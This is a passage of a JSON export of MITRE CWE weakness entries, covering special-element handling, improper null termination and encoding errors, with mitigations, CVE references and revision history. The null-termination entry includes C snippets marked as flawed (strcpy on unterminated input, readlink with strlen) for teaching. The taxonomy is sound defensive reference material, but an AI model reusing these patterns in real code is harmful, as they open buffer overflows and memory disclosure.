strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0116","Description":"Extra \\"&lt;\\" in front of SCRIPT tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0116"},{"Reference":"CVE-2001-1157","Description":"Extra \\"&lt;\\" in front of SCRIPT tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1157"},{"Reference":"CVE-2002-2086","Description":"\\"&lt;script\\" - probably a cleansing error","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2086"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Extra Special Element"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Extra Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Additional Special Element","attr":{"@_Date":"2009-05-27"}}]}},"168":{"attr":{"@_ID":"168","@_Name":"Improper Handling of Inconsistent Special Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle input in which an inconsistency exists between two or more special characters or reserved words.","Extended_Description":"An example of this problem would be if paired characters appear in the wrong order, or if the special characters are not properly nested.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"159","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control","Non-Repudiation"],"Impact":["DoS: Crash, Exit, or Restart","Bypass Protection Mechanism","Hide Activities"]}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that inconsistent special elements will be injected/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Inconsistent Special Elements"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Inconsistent Special Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Inconsistent Special Elements","attr":{"@_Date":"2010-12-13"}}]}},"170":{"attr":{"@_ID":"170","@_Name":"Improper Null Termination","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not terminate or incorrectly terminates a string or array with a null character or equivalent terminator.","Extended_Description":"Null termination errors frequently occur in two different ways. An off-by-one error could cause a null to be written out of bounds, leading to an overflow. Or, a program could use a strncpy() function call incorrectly, which prevents a null terminator from being added at all. Other scenarios are possible.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"120","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"126","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"147","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"464","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"463","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Memory","Execute Unauthorized Code or Commands"],"Note":"The case of an omitted null character is the most dangerous of the possible issues. This will almost certainly result in information disclosure, and possibly a buffer overflow condition, which may be exploited to execute arbitrary code."},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Read Memory","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"If a null character is omitted from a string, then most string-copying functions will read data until they locate a null character, even outside of the intended boundaries of the string. This could: cause a crash due to a segmentation fault cause sensitive adjacent memory to be copied and sent to an outsider trigger a buffer overflow when the copy is being written to a fixed-size buffer."},{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart"],"Note":"Misplaced null characters may result in any number of security problems. The biggest issue is a subset of buffer overflow, and write-what-where conditions, where data corruption occurs from the writing of a null character over valid data, or even instructions. A randomly placed null character may put the system into an undefined state, and therefore make it prone to crashing. A misplaced null character may corrupt other data in memory."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Alter Execution Logic","Execute Unauthorized Code or Commands"],"Note":"Should the null character corrupt the process flow, or affect a flag controlling access, it may lead to logical errors which allow for the execution of arbitrary code."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Use a language that is not susceptible to these issues. However, be careful of null byte interaction errors (CWE-626) with lower-level constructs that may be written in a language that is susceptible."},{"Phase":"Implementation","Description":"Ensure that all string functions used are understood fully as to how they append null characters. Also, be wary of off-by-one errors when appending nulls to the end of strings."},{"Phase":"Implementation","Description":"If performance constraints permit, special code can be added that validates null-termination of string buffers, this is a rather naive and error-prone solution."},{"Phase":"Implementation","Description":"Switch to bounded string manipulation functions. Inspect buffer lengths involved in the buffer overrun trace reported with the defect."},{"Phase":"Implementation","Description":"Add code that fills buffers with nulls (however, the length of buffers still needs to be inspected, to ensure that the non null-terminated string is not written at the physical end of the buffer)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code reads from cfgfile and copies the input into inputbuf using strcpy(). The code mistakenly assumes that inputbuf will always contain a NULL terminator.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define MAXLEN 1024...char *pathbuf[MAXLEN];...read(cfgfile,inputbuf,MAXLEN); //does not null terminatestrcpy(pathbuf,inputbuf); //requires null terminated input...","xhtml:br":["","","","","",""]}},"Body_Text":"The code above will behave correctly if the data read from cfgfile is null terminated on disk as expected. But if an attacker is able to modify this input so that it does not contain the expected NULL character, the call to strcpy() will continue copying from memory until it encounters an arbitrary NULL character. This will likely overflow the destination buffer and, if the attacker can control the contents of memory immediately following inputbuf, can leave the application susceptible to a buffer overflow attack."},{"Intro_Text":"In the following code, readlink() expands the name of a symbolic link stored in pathname and puts the absolute path into buf. The length of the resulting value is then calculated using strlen().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buf[MAXPATH];...readlink(pathname, buf, MAXPATH);int length = strlen(buf);...","xhtml:br":["","","",""]}},"Body_Text":"The code above will not always behave correctly as readlink() does not append a NULL byte to buf. Readlink() will stop copying characters once the maximum size of buf has been reached to avoid overflowing the buffer, this will leave the value buf not NULL terminated. In this situation, strlen() will continue traversing memory until it encounters an arbitrary NULL character further on down the stack, resulting in a length value that is much larger than the size of string. Readlink() does return the number of bytes copied, but when this return value is the same as stated buf size (in this case MAXPATH), it is impossible to know whether the pathname is precisely that many bytes long, or whether readlink() has truncated the name to avoid overrunning the buffer. In testing, vulnerabilities like this one might not be caught because the unused contents of buf and the memory immediately following it may be NULL, thereby causing strlen() to appear as if it is behaving correctly."},{"Intro_Text":"While the following example is not exploitable, it provides a good example of how nulls can be omitted or misplaced, even when \\"safe\\" functions are used:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;#include &lt;string.h&gt;int main() {}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char longString[] = \\"String signifying nothing\\";char shortString[16];strncpy(shortString, longString, 16);printf(\\"The last character in shortString is: %c (%1$x)\\\\n\\", shortString[15]);return (0);","xhtml:br":["","","","","",""]}}}},"Body_Text":"The above code gives the following output: \\"The last character in shortString is: n (6e)\\". So, the shortString array does not end in a NULL character, even though the \\"safe\\" string function strncpy() was used. The reason is that strncpy() does not impliciitly add a NULL character at the end of the string when the source is equal in length or longer than the provided size."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0312","Description":"Attacker does not null-terminate argv[] when invoking another program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0312"},{"Reference":"CVE-2003-0777","Description":"Interrupted step causes resultant lack of null termination.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0777"},{"Reference":"CVE-2004-1072","Description":"Fault causes resultant lack of null termination, leading to buffer expansion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1072"},{"Reference":"CVE-2001-1389","Description":"Multiple vulnerabilities related to improper null termination.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1389"},{"Reference":"CVE-2003-0143","Description":"Product does not null terminate a message buffer after snprintf-like call, leading to overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0143"},{"Reference":"CVE-2009-2523","Description":"Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improper Null Termination"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"String Termination Error"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Miscalculated null termination"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS30-C","Entry_Name":"Use the readlink() function properly","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR03-C","Entry_Name":"Do not inadvertently truncate a null-terminated byte string"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR32-C","Entry_Name":"Do not pass a non-null-terminated character sequence to a library function that expects a string","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP11","Entry_Name":"Improper Null Termination"}]},"Notes":{"Note":[{"#text":"Factors: this is usually resultant from other weaknesses such as off-by-one errors, but it can be primary to boundary condition violations such as buffer overflows. In buffer overflows, it can act as an expander for assumed-immutable data.","attr":{"@_Type":"Relationship"}},{"#text":"Overlaps missing input terminator.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"Conceptually, this does not just apply to the C language; any language or representation that involves a terminator could have this type of problem."},{"#text":"As currently described, this entry is more like a category than a weakness.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Common_Consequences, Description, Likelihood_of_Exploit, Maintenance_Notes, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Other_Notes, Potential_Mitigations, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Observed_Examples, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"172":{"attr":{"@_ID":"172","@_Name":"Encoding Error","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly encode or decode the data, resulting in unexpected values.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"22","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"41","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Encoding Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"80"}}]},"Notes":{"Note":[{"#text":"Partially overlaps path traversal and equivalence weaknesses.","attr":{"@_Type":"Relationship"}},{"#text":"This is more like a category than a weakness.","attr":{"@_Type":"Maintenance"}},{"#text":"Many other types of encodings should be listed in this category.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"173":{"attr":{"@_ID":"173","@_Name":"Improper Handling of Alternate Encoding","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when an input uses an alternate encoding that is valid for the control sphere to which the input is being sent.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"289","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Alternate 